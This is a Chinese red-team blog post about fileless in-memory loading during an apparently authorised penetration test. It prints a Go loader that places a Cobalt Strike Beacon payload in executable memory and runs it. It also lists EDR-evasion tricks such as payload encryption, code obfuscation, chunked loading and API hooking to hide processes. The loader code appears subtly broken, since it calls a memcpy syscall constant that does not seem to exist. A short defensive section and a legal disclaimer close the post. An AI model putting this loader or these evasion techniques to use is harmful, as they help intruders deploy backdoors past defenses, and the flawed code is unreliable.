0x01 内存游戏的开场白

在某次授权渗透测试中,我的目标是某家金融企业的内部服务器,这家公司对外宣称自己拥有业界领先的安全防护能力。然而,我的任务就是要评估他们的自信是否有根据。面对层层的防火墙、入侵检测系统(IDS)和高级EDR(Endpoint Detection and Response)产品,传统的攻击向量已经失去作用。这时,我决定利用内存加载免杀技术,直接在目标系统中执行恶意代码,而不在磁盘上留下任何痕迹。

攻击原理

内存加载技术的核心在于避免将恶意载荷写入磁盘,从而规避绝大多数基于文件的安全检测机制。具体来说,这类攻击通过将恶意代码直接注入目标进程的内存空间进行执行,通常使用被称为“反射式Dll注入”的技术。通过这种方式,我们可以在不引发安全告警的情况下,达成对目标主机的远程控制。

0x02 内存加载的环境布置

要做到这一点,首先需要搭建一个测试环境。环境需要包括以下几个组件:

  • 一台具有Windows操作系统的虚拟机,作为受害者机器。
  • 一台运行Kali Linux的虚拟机,作为攻击者机器。
  • Metasploit工具集,帮助构建Payload。
  • Go语言环境,用于编写内存加载的工具。

在配置完虚拟机后,确保两台机器在同一个网络中,这样才能实现网络通信。

虚拟机配置

  • Windows虚拟机:安装最新的Windows 10系统,确保开启防火墙和Windows Defender,以模拟真实的攻击环境。
  • Kali Linux虚拟机:安装完毕后,更新系统并安装Metasploit Framework。

0x03 内存加载的魔法:Payload构造的艺术

为了在内存中执行代码,我们需要构建一个精心设计的Payload。这里,我选择使用Cobalt Strike生成的Beacon,随后结合Go语言进行内存加载。

Go语言实现内存加载

以下是一个Go语言编写的程序,用于将Cobalt Strike生成的Payload加载至内存执行。

<pre><code class="language-go">package main

import ( &quot;syscall&quot; &quot;unsafe&quot; &quot;os&quot; &quot;io/ioutil&quot; )

// 定义Windows API需要的常量 const ( MEM_COMMIT = 0x1000 PAGE_EXECUTE_READWRITE = 0x40 )

func main() { // 从文件中读取payload payload, err := ioutil.ReadFile(&quot;payload.bin&quot;) if err != nil { println(&quot;Failed to read payload:&quot;, err.Error()) os.Exit(1) }

// 获取kernel32.dll中的VirtualAlloc函数 kernel32 := syscall.NewLazyDLL(&quot;kernel32.dll&quot;) virtualAlloc := kernel32.NewProc(&quot;VirtualAlloc&quot;)

// 分配内存 address, _, err := virtualAlloc.Call(0, uintptr(len(payload)), MEM_COMMIT, PAGE_EXECUTE_READWRITE) if address == 0 { println(&quot;Memory allocation failed:&quot;, err.Error()) os.Exit(1) }

// 将payload复制到分配的内存中 _, _, err = syscall.Syscall(syscall.SYS_MEMCPY, address, uintptr(unsafe.Pointer(&amp;payload[0])), uintptr(len(payload))) if err != 0 { println(&quot;Memory copy failed:&quot;, err.Error()) os.Exit(1) }

// 执行payload go func() { syscall.Syscall(address, 0, 0, 0, 0) }()

// 保持程序运行 select {} }</code></pre>

代码讲解

  1. 读取Payload:从文件中读取Cobalt Strike生成的Payload。
  2. 内存分配:使用VirtualAlloc分配可执行的内存块。
  3. 复制Payload:将Payload复制到分配的内存中。
  4. 执行Payload:通过syscall调用内存地址,执行Payload。

0x04 绕过与对抗:如何避开EDR的眼睛

在执行内存加载的过程中,最关键的挑战在于如何绕过目标系统的EDR。以下是几个技巧:

混淆与加壳

  • 自定义加密:在文件写入前,对Payload进行自定义加密处理,以规避特征检测。
  • 代码混淆:利用工具如Gobfuscate对Go代码进行混淆,使得反编译难度增加。

内存分块

将Payload分成若干小块,分批加载进内存,降低单次内存写入的特征值。

黑客示意图

API Hooking

通过Hook系统API干扰EDR的正常行为,例如修改NtQuerySystemInformation的返回结果,隐藏进程。

0x05 检测与防御:与攻击者的博弈

在攻击者眼中,任何防御措施都有其缺陷,以下是对抗内存加载攻击的一些建议:

加强内存监控

黑客示意图

利用内存分析工具,如Volatility,对系统进行定期的内存取证分析,检测异常内存段。

行为分析

黑客示意图

结合异常行为分析工具,监控进程间异常调用和内存分配行为,识别潜在威胁。

加固策略

  • 启用ASLR:增加内存地址随机性,阻碍内存攻击实施。
  • 应用白名单:严格限制能在系统上运行的应用程序。

0x06 红队攻防:经验与总结

在这项技术的深度应用中,我学到最重要的一点就是对目标网络环境的了解至关重要。一次成功的内存加载攻击,往往需要结合目标系统的特征,精心设计载荷并绕过防御。无论进攻还是防御,始终需要站在对方的角度思考,才能做到未雨绸缪。

合法声明:本文中的技术和代码仅供授权的安全测试和研究使用,未经授权的入侵行为是违法的。